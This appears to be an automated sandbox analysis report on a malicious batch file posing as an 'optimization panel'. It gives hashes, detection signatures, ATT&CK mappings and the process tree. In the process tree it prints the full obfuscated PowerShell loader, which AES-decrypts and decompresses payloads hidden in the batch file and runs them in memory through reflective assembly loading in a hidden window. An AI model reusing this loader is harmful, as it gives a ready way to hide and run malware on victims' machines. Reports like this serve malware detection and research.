Analysis

  • max time kernel
    52s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    09-06-2024 02:42

General

  • Target

    PaidOptimizationPanel.bat

  • Size

    519KB

  • MD5

    f2ab9e899e7a76f48bf673057e7787ea

  • SHA1

    596f8f3f081ab0a87bb651adf3918761129cb59e

  • SHA256

    4b2bbb9a5c6d64c6bda74a64ad364a8a2a1c8e6b3d93e41a335a5c5792789923

  • SHA512

    d39c261f5cec6d4e51e68cd87b14127041cf99507ef0cc9c9bf05872ca72da3bb74d4aacb55f864c00d6532d2a9117616fad5ecd996644a79ff1bac2eb977370

  • SSDEEP

    12288:Gw8iMEuAlr97ma3TeLX8Ggbcrgcaa8LCtlO3icephEXsPtOOztWeSN:GiTuMeLkbcMg8LCPMpe6WEG4eSN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\PaidOptimizationPanel.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8VrnqL5FdmunZzeVZ6qm3mq6yWYLBaHrvu1oPeSLCUs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6e3JZfxMjzGGrf+BTRgQsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $icvPY=New-Object System.IO.MemoryStream(,$param_var); $fyiKi=New-Object System.IO.MemoryStream; $qOVHn=New-Object System.IO.Compression.GZipStream($icvPY, [IO.Compression.CompressionMode]::Decompress); $qOVHn.CopyTo($fyiKi); $qOVHn.Dispose(); $icvPY.Dispose(); $fyiKi.Dispose(); $fyiKi.ToArray();}function execute_function($param_var,$param2_var){ $BdoSp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjdj=$BdoSp.EntryPoint; $CXjdj.Invoke($null, $param2_var);}$SmpZi = 'C:\Users\Admin\AppData\Local\Temp\PaidOptimizationPanel.bat';$host.UI.RawUI.WindowTitle = $SmpZi;$ACAQw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SmpZi).Split([Environment]::NewLine);foreach ($WeFFm in $ACAQw) { if ($WeFFm.StartsWith('aZvtqFFHKksqGUkZuRxa')) { $Rumeg=$WeFFm.Substring(20); break; }}$payloads_var=[string[]]$Rumeg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2920

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2920-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp
      Filesize

      4KB

    • memory/2920-6-0x0000000002810000-0x0000000002818000-memory.dmp
      Filesize

      32KB

    • memory/2920-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
      Filesize

      9.6MB

    • memory/2920-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
      Filesize

      2.9MB

    • memory/2920-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
      Filesize

      9.6MB

    • memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
      Filesize

      9.6MB

    • memory/2920-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
      Filesize

      9.6MB

    • memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
      Filesize

      9.6MB